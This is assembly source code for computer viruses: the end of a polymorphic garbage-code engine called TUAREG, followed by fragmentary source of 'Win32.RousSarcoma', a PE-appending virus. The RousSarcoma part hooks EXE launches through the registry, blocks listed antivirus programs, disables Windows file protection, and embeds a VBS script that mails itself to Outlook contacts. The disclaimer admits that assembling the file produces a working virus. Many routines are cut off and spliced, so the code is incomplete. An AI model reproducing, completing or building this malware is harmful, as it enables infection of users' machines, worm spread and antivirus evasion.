pop dword ptr [ebp+@@ValueToAdd]
pop dword ptr [ebp+@@PureValue]
mov ax, 10FFh
or ah, dl
cmp byte ptr [ebp+@@PureValue], 1
jz @@WithoutAddition
@@WithAddition:
cmp dword ptr [ebp+@@ValueToAdd], 7Fh
jbe @@WA_byte
cmp dword ptr [ebp+@@ValueToAdd], 0FFFFFF80h
jae @@WA_byte
or ah, 80h
stosw
mov eax, [ebp+@@ValueToAdd]
stosd
jmp @@OK2
@@WA_byte: or ah, 40h
stosw
mov eax, [ebp+@@ValueToAdd]
stosb
jmp @@OK2
@@WithoutAddition:
cmp dl, 5
jz @@WithAddition
@@OK: stosw
@@OK2: call DoRandomGarbage
call DoPOPReg
call ReleaseVar
; jmp @@Return
MakeCALLTo endp
ReserveReg proc
pushad
@@OtherRandom:
call Random
and eax, 3
cmp eax, 2
jz @@OtherRandom
mov dl, [ebp+eax+Index1Register]
cmp dl, 8
jnz @@AnyReg
mov dl, [ebp+Index1Register]
@@AnyReg: call DoPUSHReg
@@Return: mov [esp+S_EDX], edx
mov [esp+S_EDI], edi
popad
ret
ReserveReg endp
ReleaseReg proc
pushad
call DoPOPReg
@@Return: mov [esp+S_EDI], edi
popad
ret
ReleaseReg endp
SelectAnAddressLow proc
mov byte ptr [ebp+SelectLowAddress], 1
jmp SelectAnAddress
SelectAnAddressLow endp
SelectAnAddressHigh proc
mov byte ptr [ebp+SelectLowAddress], 0
jmp SelectAnAddress
SelectAnAddressHigh endp
SelectLowAddress db 0
;; This function gets a random register (random number between 0 and 7) and
;; keep on getting it until that number doesn't coincide with any reserved
;; register identificator, nor with ESP, nor with the selected in the last
;; call to this function or similar.
SelectARegister proc
call Random
and al, 7 ; Random between 0 and 7
cmp al, 4 ; ESP?
jz SelectARegister ; Then, repeat
cmp al, byte ptr [ebp+Index1Register] ; Equal to Index1?
jz SelectARegister ; Then, repeat
cmp al, byte ptr [ebp+Index2Register] ; Equal to Index2?
jz SelectARegister ; Then, repeat
cmp al, byte ptr [ebp+KeyRegister] ; Equal to Key?
jz SelectARegister ; Then, repeat
cmp al, byte ptr [ebp+BufferRegister] ; Equal to Buffer?
jz SelectARegister ; Then, repeat
cmp al, byte ptr [ebp+RegisterSelectedB4] ; If it's equal
jz SelectARegister ; to the last selected one, repeat
mov byte ptr [ebp+RegisterSelectedB4], al ; Save as the
ret ; last selected, and return
SelectARegister endp
;; This function does the same as the function above but with a 8 bits regis-
;; ter, so it can only select E?X registers. Since there are four reserved
;; registers and only four composed registers (E?X), maybe this registers are
;; all reserved, so we check it before, returning the value 8 if no 8 bits re-
;; gister can be selected. Also we initialize the register if the selected one
;; hasn't been "touched" before, since we only use 8 bits registers to make
;; garbage.
SelectAReg8 proc
cmp byte ptr [ebp+Index1Register], 3 ; E?X?
ja @@NoProblemo ; If, not, continue
cmp byte ptr [ebp+Index2Register], 3 ; E?X?
ja @@NoProblemo ; If, not, continue
cmp byte ptr [ebp+KeyRegister], 3 ; E?X?
ja @@NoProblemo ; If, not, continue
cmp byte ptr [ebp+BufferRegister], 3 ; E?X?
ja @@NoProblemo ; If, not, continue
mov al, 8 ; Since all reserved are E?X, we can't conti-
ret ; nue
@@NoProblemo:
call Random
and al, 3 ; Get a E?X register
cmp al, byte ptr [ebp+Index1Register] ; Is it reserved?
jz @@NoProblemo ; If not, continue
cmp al, byte ptr [ebp+Index2Register] ; Is it reserved?
jz @@NoProblemo ; If not, continue
cmp al, byte ptr [ebp+KeyRegister] ; Is it reserved?
jz @@NoProblemo ; If not, continue
cmp al, byte ptr [ebp+BufferRegister] ; Is it reserved?
jz @@NoProblemo ; If not, continue
push eax
and eax, 0FFh ; Look if the register is "touched"
cmp byte ptr [ebp+eax+TouchedRegisters], 1
jz @@OK ; If it is, jump and continue
push edx ; Save registers
mov dl, al ; DL=Selected 32 bits register
call Random ; Set a random value
call DoMOV ; Make a MOV (or similar) with the reg and the
pop edx ; value, and restore the registers from stack
@@OK: pop eax
and ah, 4
or al, ah ; Select random ?L or ?H
ret ; Return
SelectAReg8 endp
call RandomFlags
jz @@WithAddition
@@WithoutAddition:
mov ax, 15FFh ;; CALL DWORD PTR [xxx]
stosw
mov eax, [ebp+esi+APIInfo+04h]
stosd
jmp @@Continue
@@WithAddition:
cmp byte ptr [ebp+KeyIsInit], 1
jnz @@WithoutAddition
mov ax, 10FFh
or ah, [ebp+KeyRegister]
mov ecx, [ebp+esi+APIInfo+04]
sub ecx, [ebp+DecryptKey]
cmp ecx, 7Fh
jbe @@AddByte
cmp ecx, 0FFFFFF80h
jae @@AddByte
or ah, 80h
stosw
mov eax, ecx
stosd
jmp @@Continue
@@AddByte:
or ah, 40h
stosw
mov eax, ecx
stosb
@@Continue:
mov al, byte ptr [ebp+esi+APIInfo+0Bh]
or al, al
jz @@Check0
cmp al, 2
jb @@CheckMinus1
ja @@NoCheck
@@CheckBoolean:
call RandomFlags
jz @@Check0
mov al, 3Dh
stosb
mov eax, 1
stosd
jmp @@MakeCondJump
@@Check0: call Random
and al, 3
jz @@Check0
cmp al, 2
jb @@OR
jz @@AND
@@TEST: mov ax, 0C085h
stosw
jmp @@MakeCondJump
@@OR: mov ax, 0C009h
stosw
jmp @@MakeCondJump
@@AND: mov ax, 0C021h
stosw
jmp @@MakeCondJump
@@CheckMinus1:
mov al, 3Dh
stosb
mov eax, -1
stosd
@@MakeCondJump:
@@CJ_Again:
call RandomFlags
jz @@MakeJZ
mov al, 75h ; JNZ
jmp @@MakeJump
@@MakeJZ: mov al, 74h ; JZ
@@MakeJump: stosb
inc edi ; Leave space for the displacement
@@CJ_Again3:
push dword ptr [ebp+CallsLevel1Ndx] ; Save the indexes of
push dword ptr [ebp+CallsLevel2Ndx] ; the calls. If we have
push dword ptr [ebp+CallsLevel3Ndx] ; to repeat the garbage
; because it's too long, we have to restore
; this to not set any inexistent CALL dis-
; placement over other code that's not a
; CALL
@@CJ_Again2:
mov esi, edi ; Save the actual storage index
call DoRandomGarbage ; Make garbage
sub esi, edi ; Get the (-)displacement of the jump
jz @@CJ_Again2 ; If it's zero, loop to make garbage
neg esi ; Calculate true displacement
cmp esi, 7Fh ; Does it overpass the limit for displac.?
jbe @@CJ_OK ; If not, jump and continue
pop dword ptr [ebp+CallsLevel3Ndx] ; Restore this, elimi-
pop dword ptr [ebp+CallsLevel2Ndx] ; nating any created
pop dword ptr [ebp+CallsLevel1Ndx] ; call before
sub edi, esi ; Restore EDI...
jmp @@CJ_Again3 ; ...and repeat the garbage generation
; Here if the size of the garbage is correct
@@CJ_OK: pop eax ; Release the data in stack
pop eax
pop eax
mov eax, esi ; Put the displacement in AL
neg esi ; Calculate the distance until the opcode
mov byte ptr [edi+esi-1], al ; Set the displacement in
; the opcode
@@NoCheck:
call APICall_RestoreStack
APICall_StackOrder db 0
APICall_StackedRegs db 0, 0, 0
ImInAPI db 0
AnyAPIFound db 0
FirstAPICall db 0
APICall_SaveEAX proc
pushad
xor dl, dl
jmp APICall_SaveReg_Common
APICall_SaveEAX endp
APICall_SaveECX proc
pushad
mov dl, 1
jmp APICall_SaveReg_Common
APICall_SaveECX endp
APICall_SaveEDX proc
pushad
mov dl, 2
APICall_SaveReg_Common:
cmp byte ptr [ebp+Index1Register], dl
jz @@SaveReg
cmp byte ptr [ebp+Index2Register], dl
jz @@SaveReg
cmp byte ptr [ebp+BufferRegister], dl
jnz @@NoRegister
@@SaveReg:
movzx eax, byte ptr [ebp+APICall_StackOrder]
mov [ebp+eax+APICall_StackedRegs], dl
inc eax
mov [ebp+APICall_StackOrder], al
call DoPUSHReg
@@NoRegister:
call DoRandomGarbage
mov [esp+S_EDI], edi
popad
ret
APICall_SaveEDX endp
PushParameter proc
pushad
cmp al, 1
jb @@End
jz @@Random
cmp al, 3
jb @@Handle
jz @@Buffer
cmp al, 5
jb @@BufferSize
jz @@Byte
cmp al, 7
jb @@Flags
jz @@Null
cmp al, 9
jb @@VirtualPointer
@@VirtualSize:
mov al, 6Ah
stosb
call Random
and eax, 0Fh
add eax, 10h
stosb
jmp @@End
@@VirtualPointer:
mov al, 68h
stosb
call Random
and eax, 3FE0h
add eax, [ebp+EncryptedDataBeginAddress]
stosd
jmp @@End
@@Random: call Random
cmp eax, 7Fh
jbe @@RandomByte
cmp eax, 0FFFFFF80h
jae @@RandomByte
push eax
mov al, 68h
stosb
pop eax
stosd
jmp @@End
@@RandomByte:
push eax
mov al, 6Ah
stosb
pop eax
stosb
jmp @@End
@@Handle:
mov al, 68h
stosb
xor edx, edx
call Random
and eax, 1Fh
bts edx, eax
call Random
and eax, 1Fh
bts edx, eax
call Random
and eax, 1Fh
bts edx, eax
call Random
and eax, 07h
or eax, edx
stosd
jmp @@End
@@Buffer: call SelectAnAddressHigh
mov al, 68h
stosb
mov eax, ebx
stosd
jmp @@End
@@BufferSize:
mov al, 6Ah
stosb
call Random
and al, 1Fh
or al, 20h
and ah, 4
add al, ah
stosb
jmp @@End
@@Byte: mov al, 68h
stosb
call Random
and eax, 0FFh
cmp eax, 7Fh
jbe @@ByteByte
stosd
jmp @@End
@@ByteByte:
mov byte ptr [edi-1], 6Ah
stosb
jmp @@End
@@Null: mov ax, 006Ah
stosw
jmp @@End
@@Flags: xor edx, edx
call Random
and eax, 1Fh
bts edx, eax
call Random
and eax, 1Fh
bts edx, eax
call Random
and eax, 1Fh
bts edx, eax
mov al, 68h
stosb
mov eax, edx
stosd
@@End: mov [esp+S_EDI], edi
popad
ret
PushParameter endp
APICall_RestoreStack proc
pushad
movzx eax, [ebp+APICall_StackOrder]
or eax, eax
jz @@End
@@Loop01: dec eax
js @@End
mov dl, [ebp+eax+APICall_StackedRegs]
push eax
call DoPOPReg
call DoRandomGarbage
pop eax
jmp @@Loop01
@@End: mov [esp+S_EDI], edi
popad
ret
APICall_RestoreStack endp
;; API information
;; Each API information has the next format:
;;
;; +00: Checksum of API name (DWORD)
;; +04: Virtual address that will have in file, 0 if not available/imported
;; +08-09-0A: Parameters in standard order (in reverse-PUSHing order):
;; 0=No parameter (last one)
;; 1=Random number
;; 2=Pseudo-handle
;; 3=Buffer address (beware with frame)
;; 4=Buffer size
;; 5=Number between 0 and 255
;; 6=Pseudo-flags
;; 7=NULL
;; 8=Any virtual address (for IsBad* funcs)
;; 9=Virtual size (for IsBad* funcs)
;; +0B: byte: Value returning check: 0=0, 1=-1, 2=Boolean, 3=Void or random
;; (no check)
;; +0C: Reserved
;;
;; One of the most used functions in the engine. I think it's idea of Vecna
;; in one of his viruses. You get a random number and you save this random
;; as flags, so you have random flags to use with conditional jumps, getting
;; the same effect as CALL Random/AND AL,1/JZ xxx, but more optimized and with
;; more flags to use. Since SAHF only saves the general purpose flags, the
;; ones that can be modified with CMP (for example), we are sure that others
;; like IF or TF (important ones) are not modified.
RandomFlags proc
push eax ; Save EAX
call Random ; Get a random number in AH
sahf ; Load it in the flags register
pop eax ; Restore EAX
ret ; Return
RandomFlags endp
;; The random generator. I use this routine since MeDriPolEn, and it had a 48
;; bits seed which generated near a perfect random sequence. Now it's conver-
;; ted to 32 bits, so it has a 96 bits seed (!!! - outstanding!).
Random proc
push ecx ; Save register
mov eax, [ebp+DwordAleatorio1] ; Get 1st seed
dec dword ptr [ebp+DwordAleatorio1] ; Decrease to avoid linearity
xor eax, [ebp+DwordAleatorio2] ; XOR with 2nd seed
mov ecx, eax ; Result in CL
rol dword ptr [ebp+DwordAleatorio1], cl ; ROL the 1st seed CL
; times (random)
add [ebp+DwordAleatorio1], eax ; Add (1st XOR 2nd) to 1st
adc eax, [ebp+DwordAleatorio2] ; Add the 2nd seed to (1st XOR 2nd)
; with CF (random CF at the moment)
add eax, ecx ; EAX=(1st XOR 2nd)+2nd+CF
ror eax, cl ; EAX=EAX ROL (byte)(1st XOR 2nd)
not eax ; NOT (this breaks a possible proximity)
sub eax, 3 ; Subtract odd constant (break the linearity)
xor [ebp+DwordAleatorio2], eax ; Modify 2nd seed
xor eax, [ebp+DwordAleatorio3] ; XOR 3rd seed with the until-this-
; moment result
rol dword ptr [ebp+DwordAleatorio3], 1 ; Modify 3rd seed (ROL)...
sub dword ptr [ebp+DwordAleatorio3], ecx ; ...and with a 1st/2nd
; seed dependant variable
sbb dword ptr [ebp+DwordAleatorio3], 4 ; Subtract a constant value
; that could be 4 or 5
inc dword ptr [ebp+DwordAleatorio2] ; Break linearity on 2nd seed
pop ecx ; Restore register
ret ; Return
Random endp
;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;
; End of TUAREG
;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;
;ËËËËËËËËËËËËËËËËËËËËËËËËËËËËËËËËËËËËËËËËËËËËËËËËËËËËËËËËËËËËËËËËËËËËËËËËËËËË;
;ÐÐÐÐÐÐÐÐÐÐÐÐÐÐÐÐÐÐÐÐÐÐÐÐÐÐÐÐÐÐÐÐÐÐÐÐÐÐÐÐÐÐÐÐÐÐÐÐÐÐÐÐÐÐÐÐÐÐÐÐÐÐÐÐÐÐÐÐÐÐÐÐÐÐÐÐ;
;; These are the checksums of the API names. The checksum is calculated with:
;; XOR EAX,EAX
;; MOV ESI,offset String
;;Loop:
;; MOV CL,[ESI]
;; AND CL,3
;; ROL EAX,CL
;; XOR AL,[ESI]
;; INC ESI
;; CMP BYTE PTR [ESI],0
;; JNZ Loop
;;
;; Which I think is quite variable and in theory it wouldn't make any problem
;; of coincidences, since it's quite variable in the result.
;; Then, the results of making this checksums (or whatever it is) to the
;; API names are as follows:
CRC_APIs label dword
CRC_GetProcAddress dd 0342CDABh
CRC_CreateFileA dd 000147CFh
CRC_CreateProcessA dd 0A64AE17h
CRC_FindFirstFileA dd 0070244Fh
CRC_FindNextFileA dd 0003820Fh
CRC_GetFileAttributesA dd 008AEB57h
CRC_SetFileAttributesA dd 00A2EB57h
CRC_GetFullPathNameA dd 00023117h
CRC_MoveFileA dd 0002148Fh
CRC_CopyFileA dd 00008C4Fh
CRC_DeleteFileA dd 00004ACFh
CRC_WinExec dd 00006EDBh
CRC__lopen dd 00000DC2h
CRC_MoveFileExA dd 000429A7h
CRC_OpenFile dd 00000157h
CRC_ExitProcess dd 0014572Bh
CRC_WriteProcessMemory dd 0A8AE3121h
CRC_GetCurrentProcess dd 46C8D729h
CRC_CreateFileMappingA dd 0147EFAFh
CRC_MapViewOfFile dd 00950AD7h
CRC_UnmapViewOfFile dd 043D0AD7h
CRC_CloseHandle dd 00011811h
CRC_SetFilePointer dd 0014B9D6h
CRC_GetFileTime dd 00004783h
CRC_SetFileTime dd 00005383h
CRC_GetWindowsDirectoryA dd 6D1CE819h
CRC_GetCurrentDirectoryA dd 2369A80Ah
CRC_SetCurrentDirectoryA dd 7369A80Ah
CRC_GetSystemDirectoryA dd 4948E80Bh
CRC_GetSystemTime dd 00092963h
CRC_LoadLibraryA dd 0011B62Bh
CRC_FindClose dd 000E69F3h
CRC_WriteFile dd 00004F07h
CRC_FreeLibrary dd 000AE335h
dd 0 ; This signalizes the end of the APIs
;; This is the space that we use to store the addresses to the API functions.
FunctionsToPatch label dword
RVA_GetProcAddress dd 0 ; This first 15 are used for per-process
RVA_CreateFileA dd 0 ; residency
RVA_CreateProcessA dd 0
RVA_FindFirstFileA dd 0
RVA_FindNextFileA dd 0
RVA_GetFileAttributesA dd 0
RVA_SetFileAttributesA dd 0
RVA_GetFullPathNameA dd 0
RVA_MoveFileA dd 0
RVA_CopyFileA dd 0
RVA_DeleteFileA dd 0
RVA_WinExec dd 0
RVA__lopen dd 0
RVA_MoveFileExA dd 0
RVA_OpenFile dd 0
RVA_ExitProcess dd 0
RVA_WriteProcessMemory dd 0
RVA_GetCurrentProcess dd 0
RVA_CreateFileMappingA dd 0
RVA_MapViewOfFile dd 0
RVA_UnmapViewOfFile dd 0
RVA_CloseHandle dd 0
RVA_SetFilePointer dd 0
RVA_GetFileTime dd 0
RVA_SetFileTime dd 0
RVA_GetWindowsDirectoryA dd 0
RVA_GetCurrentDirectoryA dd 0
RVA_SetCurrentDirectoryA dd 0
RVA_GetSystemDirectoryA dd 0
RVA_GetSystemTime dd 0
RVA_LoadLibraryA dd 0
RVA_FindClose dd 0
RVA_WriteFile dd 0
RVA_FreeLibrary dd 0
org SystemTime
FileTime dd 0
dd 0
dd 0
dd 0
dd 0
dd 0
dd 0
dd 0
;; This is a fake host that only says that you have been infected and then
;; you are stupid for playing with files of unknown source :P (only first
;; generation!)
FakedHost: push 0
push offset Titulo
push offset Mensaje
push 0
call MessageBoxA
push 0
call ExitProcess
It's curious, but when you put the END directive under TASM, you can write
whatever you want after it and it won't be considered (I'm writing without
semicolons! :)
dsadjshajkdhsajkd
dsa
fds
fds
afdsa :P
This code is only for research and educational purposes. The assembling of
this file will produce a fully functional virus, so you have been warned! If
this kind of material is illegal in your country or state, you should remove
it from your computer. The author of this virus declines any illegal activity
including possesion and/or spreading by the possesor of the virus sourced
here. The spreading of this virus could save any life that receives the money
of anyone who got his/her web start page changed and used the
http://www.thehungersite.com donation services, but since the spreading is
illegal in the majority of the world, theorically this virus should not be
spreaded. So, do what you want :), but I'm not responsible.
;
;
; .--------------------------------.
; | |
; | Win32.RousSarcoma by SnakeByte |
; | SnakeByte@kryptocrew.de |
; | www.kryptocrew.de/snakebyte |
; .__________________________________.
;
;
; This virus was created by the idea of coding a retro virus, which
; is able too fool with some AV's. I was not able to realize all my ideas,
; but I think it is some fun. This virus uses some tricks to make disinfection
; harder. I came to the idea of making a virus which is able to drop itself to
; the original EXE File, when I saw that most AV's do not detect the first
; generation of a lot of viruses. Therefore the one part of this virus stays
; undetected by heuristics. Generally this virus consits of 2 parts. The EXE File
; Part and the one which is executed with an infected file. It "hooks" the execution
; of every EXE File and does not execute it if it is an AV. If it is none, it gets
; infected and started. Before starting the file it also checks if there is an
; mirc.ini in the same path. If there is one, it drops a mirc script worm. In Addition
; to this, the virus install itself in the registry to get started every time with windows.
; It searches the registry for more paths to infect files there. If it can't find more
; paths it drops a vbs script to send the worm around via Outlook.
;
; I am not good at writing so here is an overview of what
; the virus does :
;
;
; Name : Win32.RousSarcoma
; Type : PE-Appender by increasing last section
; Worming : Yes, mIRC Script and VBS Worm
; Operating System : Win32
; Author : SnakeByte
; Payload : None, too boring to write one ;) [ Got some other interesting stuff
; in mind i want to code as soon as possible ]
; Virus Size : 8192 Bytes
; Infection Mark : A-AV
; Encryption : None
; Autostart : RunOnce & exefiles
; Anti-Bait : Does not infect files < 20000 Bytes
; Anti-Debugging : Yes, against SoftIce and Int 1h tracing
; Anti-AV : Yes, does not allow the execution of several AV's
; disables Win2k File Protection
; Anti-User : Hides itself in files & several different places,
; is not shown at ctrl-alt-del list
; Runs at Level : Ring-3, but still infects every EXE File on executing
; Infects : 10 Files in the current directory,
; 10 Files in every path stored in this registry Key :
; HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths
; Every EXE File which gets executed
;
; How to compile ( TASM 5.0 ) :
;
; tasm32 /z /ml /m3 RousSarc,,;
; tlink32 -Tpe -c RousSarc,RousSarc,, import32.lib
; pewrsec RousSarc.EXE
;
; ( Make sure that the .EXE is uppercases !! )
;
; At the moment there are just 100 Bytes of Code i could add, with the file staying
; at 8192 Bytes. If I would add more, the file would grow to 12 KB. I decided to
; keep it small and leave stuff out like encryption or even poly. Maybe it could
; be optimized on several parts to make it fit with encryption to a 8 KB file,
; but I don't mind at the moment
;
;
;
; Thanks and greetz to :
;
; Lord Arz : Did you also finish your EXEFILES "hooking" something ? ;)
; DukeCS : Heh, when will KC be done ? *fg*
; Matsad : Sorry, for not coming, but i got no cash and need to see my girlfriend :P
; Lethal Mind : Heh, where are you ? ;(
; Ciatrix : Nice that you carry on !
;
;
; ***************************************************************************
; ------------------------[ Let's get ready to rumble ]----------------------
; ***************************************************************************
.586p
.model flat
jumps ; calculate Jumps
.radix 16 ; Hexadecimal numbers
.code
; Some constants
VirusSize equ 8192d ; Lenght of EXE-File
ImageBase equ 400000h ; Imagebase of our TASM generated EXE-File
; ###########################################################################
; -------------------[ This is the first part of the virus ]-----------------
; ###########################################################################
Virus:
; Here do we search for EXE-files and put the
; entire PE-Virus EXE to the end !
; we search for the needed api's with GetProcAdress
; and LoadModuleHandle, so we will not get Problems
; with missing DLL's or API's
NoHide:
; ***************************************************************************
; ---------------------------[ Initialisation ]------------------------------
; ***************************************************************************
; Lets do a check on our commandline params,
; to see, if we got startet with a filename
; in it --> exefile method
CommandOK1:
add eax, 4h ; eax points directly after the <name>.exe
cmp byte ptr [eax], 0 ; if the Commandline ends here, we do not need
je SetRunOnceKey ; to care about this ;)
push esi
call AVNameCheck
cmp esi, 0
je AVMessage
pop esi
jmp mIRCcheck
PathEnd dd 0h
push 0
push 080h ; normal attribs
push 2h ; create a new file (always)
push 0
push 0
push 0C0000000h ; read + write
lea eax, NameBuffer ; file we create
push eax
Call dword ptr [XCreateFileA]
cmp eax, 0FFFFFFFFh
je NoMirc
NoMirc:
; close the search handle
push dword ptr [FindHandle]
call dword ptr [XCloseHandle]
popad
push eax
push esi
call FindFirstFileProc
pop esi ; esi points to start of filename
pop ebx ; ebx points to the parameters
cmp eax, 0
jne CheckOwnKey
push ebx
push offset NameBuffer ; Value
push 1h ; String
push 0 ; reserved
push offset Valuename ; value name
push dword ptr [RegHandle]
call dword ptr [XRegSetValueExA]
jmp FirstGenHost
SaveBlanc dd 0h
EXEFilesKey db 'exefile\shell\open\command',0
EXEFilesValue db 'RousSarc.EXE "%1" %*',0
EFVSize equ $ - offset EXEFilesValue
; ***************************************************************************
; ------------------------------[ Outbreak ! ]-------------------------------
; ***************************************************************************
Outbreak: ; We got no commandline !
HKEY_CURRENT_USER equ 80000001h
HKEY_LOCAL_MACHINE equ 80000002h
; first of all, let's disable the win2k virus protection
push offset RegHandle
push 001F0000h ; complete access
push 0h ; reserved
push offset _2kProt ; check if our key exists
push HKEY_LOCAL_MACHINE ; HKEY_LOCAL_MACHINE
call dword ptr [XRegOpenKeyExA]
push 4
push offset RegBuffer ; Value
push 4h ; REG_DWORD
push 0 ; reserved
push offset _2kProtValue ; value name
push dword ptr [RegHandle]
call dword ptr [XRegSetValueExA]
; Close it again
push dword ptr [RegHandle]
call dword ptr [XRegCloseKey]
CommandOK3:
add eax, 4h ; eax points directly after the <name>.exe
mov byte ptr [eax], 0 ; Place a 0 here to copy the file
push 255d
push offset NameBuffer
call dword ptr [XGetWindowsDirectoryA]
cmp eax, 0
jne CheckOwnKey
CheckOwnKey:
mov dword ptr [RegBuffer], 0h
KeySet:
push 4
push offset RegBuffer ; Value
push 4h ; REG_DWORD
push 0 ; reserved
push offset Valuename ; value name
push dword ptr [RegHandle]
call dword ptr [XRegSetValueExA]
; Now we decide what to do ( we start with 2 because we just incremented it and i will not
do anything after
; the second start, cause we need one reboot to disable WFP ) :
;
; Value - what to do
;
; 2 - infect directory 1 of
; HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths
; 3 - " " 2 " ""
; 4 - " " 3 " ""
; 5 - " " 4 " ""
; 6 - " " 5 " ""
; ... no more directorys in RegKey ? --> set value to 0
dec eax
dec eax
jz NoRegistryInfection
push eax
pop eax
push 255d
push offset NameBuffer
push eax ; Key Number we want to retrieve
push dword ptr [RegHandle]
call dword ptr [XRegEnumKeyA]
cmp eax, 0
jne DropVBSWorm
; Read Vakze
CloseRegInfection:
push dword ptr [RegHandle]
call dword ptr [XRegCloseKey]
NoRegistryInfection:
jmp CloseRegInfection
VBSscript:
db 'On Error Resume Next', 13d, 10d
db 'Dim R', 13d, 10d
db 'Set RS=CreateObject("Outlook.Application")', 13d, 10d
db 'For R=1 To 500', 13d, 10d
db 'Set Mail=RS.CreateItem(0)', 13d, 10d
db 'Mail.to=RS.GetNameSpace("MAPI").AddressLists(1).AddressEntries(x)', 13d, 10d
db 'Mail.Subject="Funny Thing !"', 13d, 10d
db 'Mail.Body="Take a look at this and just start laughing !"', 13d, 10d
db 'Mail.Attachments.Add("C:\RousSarc.EXE")', 13d, 10d
db 'Mail.Send', 13d, 10d
db 'Next', 13d, 10d
db 'RS.Quit', 13d, 10d, 13d, 10d
EndVBSScript:
VBSWorm db 'C:\RousSarc.vbs',0
; ***************************************************************************
; --------------------------[ Infection current dir ]------------------------
; ***************************************************************************
InfectCurDirFile:
; Filename in esi
lea esi, WFD_szFileName
call InfectFile ; Try it !
cmp dword ptr [InfCounter], 0h
jna EndInfectCurDir2
call FindNextFileProc
EndInfectCurDir1:
ret
; ***************************************************************************
; -------------------------[ prepare Infection ]----------------------------
; ***************************************************************************
call AVNameCheck
cmp esi, 0h
je NoInfection
Notagoodfile:
call UnMapFile
NoInfection:
ret
; ***************************************************************************
; ------------------------------[ File-Handling ]----------------------------
; ***************************************************************************
; FileName needs to be in esi
OpenFile:
xor eax,eax ; Open Files
push eax
push eax
push 3h
push eax
inc eax
push eax
push 80000000h or 40000000h
push esi ; Filename is in ESI
call dword ptr [XCreateFileA]
inc eax
jz Closed
dec eax
CreateMap:
push ecx
xor eax,eax
push eax
push ecx
push eax
push 00000004h
push eax
push dword ptr [FileHandle]
call dword ptr [XCreateFileMappingA]
mov dword ptr [MapHandle],eax
xor eax,eax
push ecx
push eax
push eax
push 2h
push dword ptr [MapHandle]
call dword ptr [XMapViewOfFile]
or eax,eax
jz UnMapFile
; EAX contains starting offset of the map
mov dword ptr [MapAddress],eax
clc
ret
UnMapFile:
call UnMapFile2
CloseFile:
push dword ptr [FileHandle]
call [XCloseHandle]
Closed:
stc
ret
UnMapFile2:
push dword ptr [MapAddress]
call dword ptr [XUnmapViewOfFile]
ret
; ***************************************************************************
; ---------------------[ Infection of the EXE-File ]-------------------------
; ***************************************************************************
call Align
mov dword ptr [NewSize], eax
xchg ecx, eax
pushad
call UnMapFile2 ; remap file
popad
call CreateMap
jc NoEXE
; esi = PE-Header
mov esi, dword ptr [eax+3Ch]
; get Imagebase
mov eax, [edi+34h]
mov dword ptr [OldBase], eax
pop edx
call OpenMyself
; lets save the right Imagebase and EIP
; inside our buffered file ;)
pop edi
lea esi, FileBuffer
mov ecx, VirusSize ; First Part
rep movsb ; append
; we need two steps, otherwise we would fill the
NoEXE:
stc
ret
; ***************************************************************************
; -------------------------[ Open Us-Prozedur ]------------------------------
; ***************************************************************************
OpenMyself: ; this Procedure returns the start of
; the current file in esi
; first we need the filename
pushad
call dword ptr [XGetCommandLineA]
inc eax
mov dword ptr [CmdLine], eax
CommandReceive:
cmp dword ptr [eax],'EXE.'
je CommandOK
inc eax
jmp CommandReceive
CommandOK:
add eax, 4h
mov byte ptr [eax],0 ; CmdLine contains now a pointer
; to the filename of our file
mov esi, dword ptr [CmdLine]
push ebx
call dword ptr [XCloseHandle]
popad
ret
Read dd ?
; ***************************************************************************
; -----------------------[ Check if we got an AV ]---------------------------
; ***************************************************************************
AVNameCheck: ; pointer to name is in esi
pushad ; save all registers
NameCheckLoop:
cmp byte ptr [esi], 0 ; check if we are at the end
je NameTransferred
lodsb ; get first letter
cmp al, 96d
jb StoreLetter
sub al, 32d ; convert to uppercase
StoreLetter:
stosb
inc ecx
jmp NameCheckLoop
SearchOn:
mov esi, dword ptr [NameESI] ; avname
mov edi, dword ptr [NameEDI]
NoAV:
ret
db 'AVE32' ; Anti-Vir
db 'AVGCTRL'
db 'AVWIN95'
db 'SCAN32' ; DR-Solomon
db 'AVCONSOL'
db 'VSHWIN32'
db 'FP-WIN' ; F-Prot
db 'F-STOPW'
db 'DVP95' ; F-Secure
db 'F-AGNT95'
db 'F-PROT95'
db 'VET95' ; InnoculateIT
db 'VETTRAY'
db 'NAVAPW32' ; Norton
db 'NAVW32'
db 'SWEEP95' ; Sophos
db 'IOMON98' ; PC-Cillin
db 'PCCWIN98'
db 'MONITOR' ; RAV
db 'RAW7WIN'
AVLenght:
db 4d, 5d, 5d, 5d, 5d, 6d, 6d, 6d ; AVP
db 5d, 7d, 7d ; ANTI-Vir
db 6d, 8d, 8d ; DR-Solomon
db 6d, 7d ; F-PROT
db 5d, 8d, 8d ; F-Secure
db 5d, 7d ; Innoculate-IT
db 6d, 5d ; Norman
db 8d, 6d ; Norton
db 7d ; Sophos
db 7d, 8d ; PC-Cillin
db 7d, 7d ; RAV
; ***************************************************************************
; --------------------------[ Align-Prozedur ]-------------------------------
; ***************************************************************************
; eax - Size
; ecx - base
Align:
push edx
xor edx, edx
push eax
div ecx
pop eax
sub ecx, edx
add eax, ecx
pop edx ; eax - New Size
ret
; ***************************************************************************
; --------------------------[ FindFile Prozeduren ]--------------------------
; ***************************************************************************
FindNextFileProc:
call ClearFindData
lea eax, WIN32_FIND_DATA
push eax
mov eax, dword ptr [FindHandle]
push eax
call dword ptr [XFindNextFileA]
ret
ClearFindData:
lea edi, WFD_szFileName
mov ecx, 276d ; clear old data
xor eax, eax
rep stosb
ret
;****************************************************************************
;-----------------------------[ PE / MZ Check ]------------------------------
;****************************************************************************
; Check MZ and PE - Signs
CheckPESign:
cmp dword ptr [edi], 'FP' ; greater or equal to "PF"
jae NoPESign
NoPESign:
stc
ret
CheckMZSign:
clc
ret
ret
; ***************************************************************************
; ----------------[ This is the host for the EXE-Virus Part ]----------------
; ***************************************************************************
FirstGenHost:
push 0h ; stop this !
call ExitProcess
jmp FirstGenHost
;
; \\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\
; ////////////////////////////////////////////////////////////////////////////\
; ###########################################################################/\
; ------------------[ This is the second part of the Virus ]-----------------/\
